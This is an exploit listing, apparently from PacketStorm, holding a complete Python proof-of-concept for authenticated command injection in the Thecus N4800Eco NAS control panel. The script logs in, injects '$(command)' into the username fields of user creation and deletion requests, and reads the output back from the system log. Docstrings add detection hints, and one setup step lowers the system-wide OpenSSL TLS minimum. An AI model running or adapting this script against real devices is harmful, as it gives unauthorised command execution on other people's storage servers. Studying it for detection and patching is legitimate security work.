## https://sploitus.com/exploit?id=PACKETSTORM:162917
# Exploit Title: Thecus N4800Eco Nas Server Control Panel - Command Injection  
# Date: 01/06/2021  
# Exploit Author: Metin Yunus Kandemir  
# Vendor Homepage: http://www.thecus.com/  
# Software Link: http://www.thecus.com/product.php?PROD_ID=83  
# Version: N4800Eco  
# Description: https://docs.unsafe-inline.com/0day/thecus-n4800eco-nas-server-control-panel-comand-injection  
  
  
#!/usr/bin/python3  
import requests  
import sys  
import urllib3  
  
  
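# To fix the SSL error that can occur when the script is started:  
# 1- Open the /etc/ssl/openssl.cnf file.  
#    At the bottom of the file you will find:  
#    [system_default_sect]  
#    MinProtocol = TLSv1.2  
#    CipherString = DEFAULT@SECLEVEL=2  
# 2- Set the value of MinProtocol to TLSv1.0.  
# Note: this is the system-wide OpenSSL configuration, so the lowered MinProtocol  
# applies to every program on the testing host that reads it, not only this script.  
# Restore MinProtocol = TLSv1.2 once testing is finished.  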
  
  
def readResult(s, target):
    """Query the panel's system log and print a short slice of the reply.

    Posts ``fun=setlog`` / ``action=query`` to ``/adm/setmain.php`` on the
    session ``s`` and asks for a single entry (``start`` 0, ``limit`` 1) of
    the ``sys`` category at every level. The reply body is split on
    whitespace and only tokens 5..7 are printed.

    In this PoC the call runs right after the user-deletion request, so the
    printed tokens are presumably where the injected command's output ends up
    (confirm against the linked write-up). For defenders that means shell
    output showing up inside user-management entries of the system log is an
    indicator worth alerting on.

    Args:
        s: Session object exposing ``post``; expected to be logged in already.
        target: ``host:port`` of the panel, as given on the command line.
    """
    endpoint = "".join(("http://", target, "/adm/setmain.php"))
    log_query = {
        "fun": "setlog",
        "action": "query",
        # "catagory" is the spelling this request uses; it is kept verbatim.
        "params": '[{"start":0,"limit":1,"catagory":"sys","level":"all"}]',
    }
    # The URL is plain http://, so verify=False only matters if the request
    # ends up on HTTPS (redirects are followed here by default).
    tokens = s.post(endpoint, data=log_query, verify=False).text.split()
    print("[+] Reading system log...\n")
    # Author's note: widen this slice to see the whole logged output.
    print(tokens[5:8])
  
def delUser(s, target, command):
    """Send the local-user delete request whose ``username`` carries ``$(command)``.

    The request goes to ``/adm/setmain.php?fun=setlocaluser`` with
    ``action=delete``. The PoC treats the reply text
    ``Local User remove succeeds`` as proof that the command ran; any other
    reply prints a failure line and exits with status 1. On success the
    system log is read back through ``readResult``.

    Defensive reading: the ``username`` value reaches the device wrapped in
    shell command-substitution syntax, which per the advisory title is not
    neutralised server-side (the server code is not shown here). Requests to
    this endpoint whose ``username`` contains ``$(``, backticks or other shell
    metacharacters are a detection signal, and the vendor-side fix is strict
    validation of user names before they reach any shell.

    Args:
        s: Authenticated session object exposing ``post``.
        target: ``host:port`` of the panel.
        command: Text placed inside ``$(...)`` in the ``username`` field.
    """
    endpoint = "".join(("http://", target, "/adm/setmain.php?fun=setlocaluser"))
    form = {
        "action": "delete",
        "username": "$(" + command + ")",
    }
    reply = s.post(endpoint, data=form, allow_redirects=False, verify=False)

    if 'Local User remove succeeds' not in reply.text:
        print('[-] %s command was not executed!' % command)
        sys.exit(1)

    print('[+] %s command was executed successfully' % command)
    readResult(s, target)
  
def addUser(s, target, command):
    """Submit a batch user-creation request whose first field is ``$(command)``.

    Posts ``batch_content`` to ``/adm/setmain.php?fun=setbatch``. The literal
    already contains percent-escapes (``%24`` is ``$``, ``%2C`` is ``,``), so
    its decoded shape is ``$(command),22222,9999``; what the second and third
    fields mean to the panel is not shown here (presumably password and
    group or id; confirm against the write-up). The reply must contain
    ``Users and groups were created successfully.``; otherwise the script
    prints a failure line and exits with status 1. On success it continues
    with ``delUser`` for the same ``command``.

    Defensive reading: a batch-creation entry whose user-name field contains
    ``$(`` (raw or percent-encoded) is not a plausible account name and can be
    rejected or alerted on at the panel or at a reverse proxy in front of it.

    Args:
        s: Authenticated session object exposing ``post``.
        target: ``host:port`` of the panel.
        command: Text placed inside the ``$(...)`` user-name field.
    """
    endpoint = "".join(("http://", target, "/adm/setmain.php?fun=setbatch"))
    form = {'batch_content': '%24(' + command + ')%2C22222%2C9999'}
    reply = s.post(endpoint, data=form, allow_redirects=False, verify=False)

    if 'Users and groups were created successfully.' not in reply.text:
        print('[-] Users and groups were not created')
        sys.exit(1)

    print('[+] Users and groups were created successfully')
    delUser(s, target, command)
  
def login(target, username, password, command=None):
    """Log in to the control panel and hand the session on to ``addUser``.

    Posts the credentials to ``/adm/login.php`` and inspects the reply text:
    ``"success":true`` continues, ``"success":false`` reports a failed
    authentication, anything else reports a generic error; both failure paths
    exit with status 1.

    Defensive reading: every later request in this script depends on this
    login, so the issue is reachable only with valid panel credentials.
    Keeping the admin panel off untrusted networks and replacing weak or
    default admin passwords narrows exposure. The credentials are sent in a
    form body over plain ``http://``, so they are also visible to anyone on
    the network path.

    Args:
        target: ``host:port`` of the panel.
        username: Panel account name.
        password: Panel account password.
        command: Passed through unchanged to ``addUser``.
    """
    # Silences the warning requests would emit for verify=False on HTTPS.
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    session = requests.Session()
    endpoint = "".join(("http://", target, "/adm/login.php"))
    credentials = {
        # The leading "&" in this key is part of the request as published.
        "&eplang": "english",
        "p_pass": password,
        "p_user": username,
        "username": username,
        "pwd": password,
        "action": "login",
        "option": "com_extplorer",
    }
    reply = session.post(endpoint, data=credentials, allow_redirects=False, verify=False)
    body = reply.text

    if '"success":true' not in body:
        if '"success":false' in body:
            print('[-] Authentication failed!')
        else:
            print('[-] Something went wrong!')
        sys.exit(1)

    print('[+] Authentication successful')
    addUser(session, target, command)
  
def main(args):
    """Validate the argument vector and start the login step.

    Expects exactly five entries: the program name followed by
    ``targetIp:port``, ``username``, ``password`` and ``command``. Any other
    count prints the usage text and exits with status 1.

    Args:
        args: Argument vector in ``sys.argv`` layout.
    """
    if len(args) != 5:
        print("usage: %s targetIp:port username password command" % (args[0]))
        print("Example 192.168.1.13:80 admin admin id")
        sys.exit(1)

    _, host, user, secret, cmd = args
    login(target=host, username=user, password=secret, command=cmd)
  
  
# Run only when executed as a script; importing the module has no side effects.
if __name__ == "__main__":
    main(sys.argv)